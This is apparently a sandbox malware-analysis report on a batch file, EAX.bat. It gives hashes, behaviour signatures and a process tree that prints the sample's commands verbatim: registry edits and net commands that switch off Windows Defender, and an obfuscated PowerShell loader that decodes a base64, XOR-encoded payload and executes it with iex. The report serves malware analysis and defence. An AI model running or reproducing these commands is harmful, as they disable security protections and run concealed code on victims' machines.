Analysis
-
max time kernel
133s -
max time network
146s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
08-05-2024 21:46
Static task
static1
Behavioral task
behavioral1
Sample
EAX.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
EAX.bat
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
EAX.bat
Resource
win10v2004-20240226-en
General
-
Target
EAX.bat
-
Size
13KB
-
MD5
702ac05d7d2c6fcb005d0f072e7e1dee
-
SHA1
0538b012778f133432a0778fdb540292b9f6ef94
-
SHA256
d6df7159e2798c2e3a8d65c2a15d15bd85a9d4a73d1a196ba7bebc32113b20f9
-
SHA512
e9179fc17d850c840df69a5580c016155cba2cfad099cac1b74037fb16b77156035b948f0eec1ee78c17e8153eab33135fe6ae0f6ded9813e972b7585845c796
-
SSDEEP
384:+SopGvVZz6qws74S+ngzstcpshXrDUsDul0f6dniof5+tLohTleawO6jxi5Dm3u4:Ljmq97R+kpmDUXBK8w19mm3v
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1752 powershell.exe -
pid Process 1752 powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1752 powershell.exe 1752 powershell.exe 1752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1752 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 3608 wrote to memory of 3884 3608 cmd.exe 75 PID 3608 wrote to memory of 3884 3608 cmd.exe 75 PID 3884 wrote to memory of 4776 3884 net.exe 76 PID 3884 wrote to memory of 4776 3884 net.exe 76 PID 3608 wrote to memory of 5016 3608 cmd.exe 77 PID 3608 wrote to memory of 5016 3608 cmd.exe 77 PID 3608 wrote to memory of 4876 3608 cmd.exe 78 PID 3608 wrote to memory of 4876 3608 cmd.exe 78 PID 3608 wrote to memory of 4884 3608 cmd.exe 79 PID 3608 wrote to memory of 4884 3608 cmd.exe 79 PID 4884 wrote to memory of 4840 4884 net.exe 80 PID 4884 wrote to memory of 4840 4884 net.exe 80 PID 3608 wrote to memory of 732 3608 cmd.exe 81 PID 3608 wrote to memory of 732 3608 cmd.exe 81 PID 732 wrote to memory of 4404 732 net.exe 82 PID 732 wrote to memory of 4404 732 net.exe 82 PID 3608 wrote to memory of 1752 3608 cmd.exe 83 PID 3608 wrote to memory of 1752 3608 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EAX.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:4776
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:5016
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4876
-
-
C:\Windows\system32\net.exenet stop WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WinDefend3⤵PID:4840
-
-
-
C:\Windows\system32\net.exenet start WinDefend2⤵
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start WinDefend3⤵PID:4404
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -encodedCommand $ h e h e h e   =   " N C c 8 M S Y 7 P T x y H j 0 9 O S c i F C c 8 M X I p X 1 h y c n J y A j M g M z 9 y e n Y / P T Y n P j c c M z 8 3 f n J 2 N C c 8 M S Y 7 P T w c M z 8 3 e 1 9 Y c n J y c n Y z I S E 3 P 3 J v c n o J E y I i F j 0 / M z s 8 D 2 h o E S c g I D c 8 J h Y 9 P z M 7 P H w V N y Y T I S E 3 P z A + O z c h e n t y L l 9 Y c n J y c g U 6 N y A 3 f x 0 w O D c x J n I p c n Y N f B U + P T A z P h M h I T c / M D 4 r E T M x O j d y f x M 8 N n J 2 D X w e P T E z J j s 9 P H w B I j 4 7 J n p 1 D g 5 1 e w l / Y w 9 8 X 1 h y c n J y c h c j J z M + I X p 1 A S s h J j c / f D Y + P n V 7 X 1 h y c n J y c i 9 7 f B U 3 J g Y r I j d 6 d R 8 7 M S A 9 I T 0 0 J n w F O z x h Y H w H P C E z N D c c M y Y 7 J D c f N y Y 6 P T Y h d X t f W H J y c n J 2 J j 8 i b x J 6 e 1 9 Y c n J y c n Y z I S E 3 P 3 w V N y Y f N y Y 6 P T Y h e n t y L n I U P S A X M z E 6 f x 0 w O D c x J n I p G z R 6 d g 1 8 H D M / N 3 J / P j s 5 N 3 J w F T d 4 A n g 9 M X g 2 N i A 3 I S F w e 3 I p d i Y / I n l v d g 0 v L 1 9 Y c n J y c i A 3 J i c g P H J 2 J j 8 i C W I P f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 y E n p 6 d j M h I T c / f B U 3 J h 8 3 J j o 9 N n p 1 F T c m H z 0 2 J z 4 3 G j M 8 N j 4 3 d X t 7 f B s 8 J D 0 5 N 3 p 2 P C c + P n 5 f W B J 6 d j 8 9 N i c + N x w z P z d 7 e 3 5 y d j Q n P D E m O z 0 8 H D M / N 3 t 7 X 1 g v X 1 h f W F 9 Y N C c 8 M S Y 7 P T x y N T c m F j c + N z U z J j c G K y I 3 c i l f W H J y c n I C M y A z P 3 J 6 X 1 h y c n J y c g k C M y A z P z c m N y B 6 A j 0 h O y Y 7 P T x y b 3 J i f n I f M z w 2 M y Y 9 I C t y b 3 J 2 B i A n N 3 s P c g k G K y I 3 C Q 8 P X 1 h y c n J y c n Y 0 J z w x f n I J A j M g M z 8 3 J j c g e g I 9 I T s m O z 0 8 c m 9 y Y 3 s P c g k G K y I 3 D 3 J 2 N j c + B i s i N 3 J v c g k E P T s 2 D 1 9 Y c n J y c n t f W H J y c n J 2 J i s i N 3 J v c g k T I i I W P T 8 z O z w P a G g R J y A g N z w m F j 0 / M z s 8 f F 9 Y c n J y c h Y 3 N D s 8 N x Y r P D M / O z E T I S E 3 P z A + K 3 p 6 H D c l f x 0 w O D c x J n I B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w T I S E 3 P z A + K x w z P z d 6 d Q A 3 N D 4 3 M S Y 3 N h Y 3 P j c 1 M y Y 3 d X t 7 f l 9 Y C Q E r I S Y 3 P 3 w A N z Q + N z E m O z 0 8 f B c / O y Z 8 E y E h N z 8 w P i s Q J z s + N j c g E z E x N y E h D 2 h o A C c 8 e 3 x f W H J y c n I W N z Q 7 P D c W K z w z P z s x H z 0 2 J z 4 3 e n U b P B 8 3 P z 0 g K x 8 9 N i c + N 3 V + c n Y 0 M z 4 h N 3 t 8 X 1 h y c n J y F j c 0 O z w 3 B i s i N 3 p 1 H y s W N z 4 3 N T M m N w Y r I j d 1 f n J 1 E T 4 z I S F + c g I n M D 4 7 M X 5 y A T c z P j c 2 f n I T P C E 7 E T 4 z I S F + X 1 h y c n J y E y c m P R E + M y E h d X 5 y C Q E r I S Y 3 P 3 w f J z 4 m O z E z I S Y W N z 4 3 N T M m N w 9 7 X 1 h f W H J y d i Y r I j d 8 X 1 h y c n J y F j c 0 O z w 3 E T 0 8 I S Y g J z E m P S B 6 d Q A G A S I 3 M T s z P h w z P z d + c h o 7 N j c Q K w E 7 N X 5 y A i c w P j s x d X 5 f W A k B K y E m N z 9 8 A D c 0 P j c x J j s 9 P H w R M z 4 + O z w 1 E T 0 8 J D c 8 J j s 9 P C E P a G g B J j M 8 N j M g N n 5 y d j Q n P D F 7 f F 9 Y c n J y c n I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W F 9 Y c n J 2 J i s i N 3 x f W H J y c n I W N z Q 7 P D c f N y Y 6 P T Z 6 d R s 8 J D 0 5 N 3 V + c n U C J z A + O z F + c h o 7 N j c Q K w E 7 N X 5 y H D c l A T 4 9 J n 5 y B D s g J i c z P n V + c n Y 2 N z 4 G K y I 3 f l 9 Y d j Q n P D F 7 f H I B N y Y b P y I + N z 8 3 P C Y z J j s 9 P B Q + M z U h e n U A J z w m O z 8 3 f n I f M z w z N T c 2 d X t f W H J y c n I g N y Y n I D x y d i Y r I j d 8 E S A 3 M y Y 3 B i s i N 3 p 7 X 1 g v X 1 h f W F 9 Y C R s 8 J g I m I A 9 2 N C c 8 M R M 2 N i B y b 3 I e P T 0 5 J y I U J z w x c j M / I T t 8 N j 4 + c h M / I T s d I j c 8 A T c h I T s 9 P F 9 Y d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B y b 3 J i X 1 h 2 J C J v C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o F T c m F j c + N z U z J j c U P S A U J z w x J j s 9 P A I 9 O z w m N y B 6 e h 4 9 P T k n I h Q n P D F y O T c g P D c + Y W B 8 N j 4 + c g Q 7 I C Y n M z 4 C I D 0 m N z E m e 3 5 y e j U 3 J h Y 3 P j c 1 M y Y 3 B i s i N 3 I S e g k b P C Y C J i A P f n I J B x s 8 J m F g D 3 5 y C Q c b P C Z h Y A 9 + c g k H G z w m Y W A P f B 8 z O T c Q K w A 3 N A Y r I j d 6 e 3 t y e g k Q P T 0 + D 3 t 7 e 1 9 Y d i Q i f B s 8 J D 0 5 N 3 p 2 N C c 8 M R M 2 N i B + c m F + c m I q Z m J + c g k g N z Q P d j 0 + N g I g P S Y 3 M S Y 7 P T w Q J z Q 0 N y B 7 X 1 h 2 M C c 0 c m 9 y C R A r J j c J D w 9 y e m I q Z m p + Y i p h Y 3 5 i K j F r e 1 9 Y C Q E r I S Y 3 P 3 w A J z w m O z 8 3 f B s 8 J j c g P S I B N y A k O z E 3 I X w f M y A h O j M + D 2 h o E T 0 i K 3 p 2 M C c 0 f n J i f n J 2 N C c 8 M R M 2 N i B + c m F 7 X 1 g l N T c m c n A 6 J i Y i I W h 9 f T R m Z z E x N m N m f z E 2 Y T R / Z m V m M 3 9 q a m s 3 f z Y 3 Y z N i a 2 B n M W R h Y n 9 i Y n 8 5 I m U j M y U z M D 0 h J T N 8 I D s 5 N y B 8 I D c i P j s m f D Y 3 J H 0 A N z U 7 I S Y g M y Y 7 P T x 8 N y o 3 f n B y f x 1 y c B F o D g c h N y A h D n Y 3 P C R o B w E X A B w T H x c O E y I i F j M m M w 4 e P T E z P g 4 G N z 8 i D g A 3 N T s h J i A z J j s 9 P H w 3 K j d w X 1 g B J j M g J n 8 C I D 0 x N y E h c n 8 U O z 4 3 A j M m O n J w E W g O B y E 3 I C E O d j c 8 J G g H A R c A H B M f F w 4 T I i I W M y Y z D h 4 9 M T M + D g Y 3 P y I O A D c 1 O y E m I D M m O z 0 8 f D c q N 3 B y "  
 $ X o r _ V a l   =   8 2  
 $ x r   =   [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ h e h e h e )  
 $ f a f a f   =   $ x r   |   F o r E a c h - O b j e c t   {   r e t u r n   $ _   - b x o r   $ X o r _ V a l   }  
 $ d e c s c r   =   [ t e x t . e n c o d i n g ] : : u t f 8 . G e t S t r i n g ( $ f a f a f )  
 i e x   $ d e c s c r  
 2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a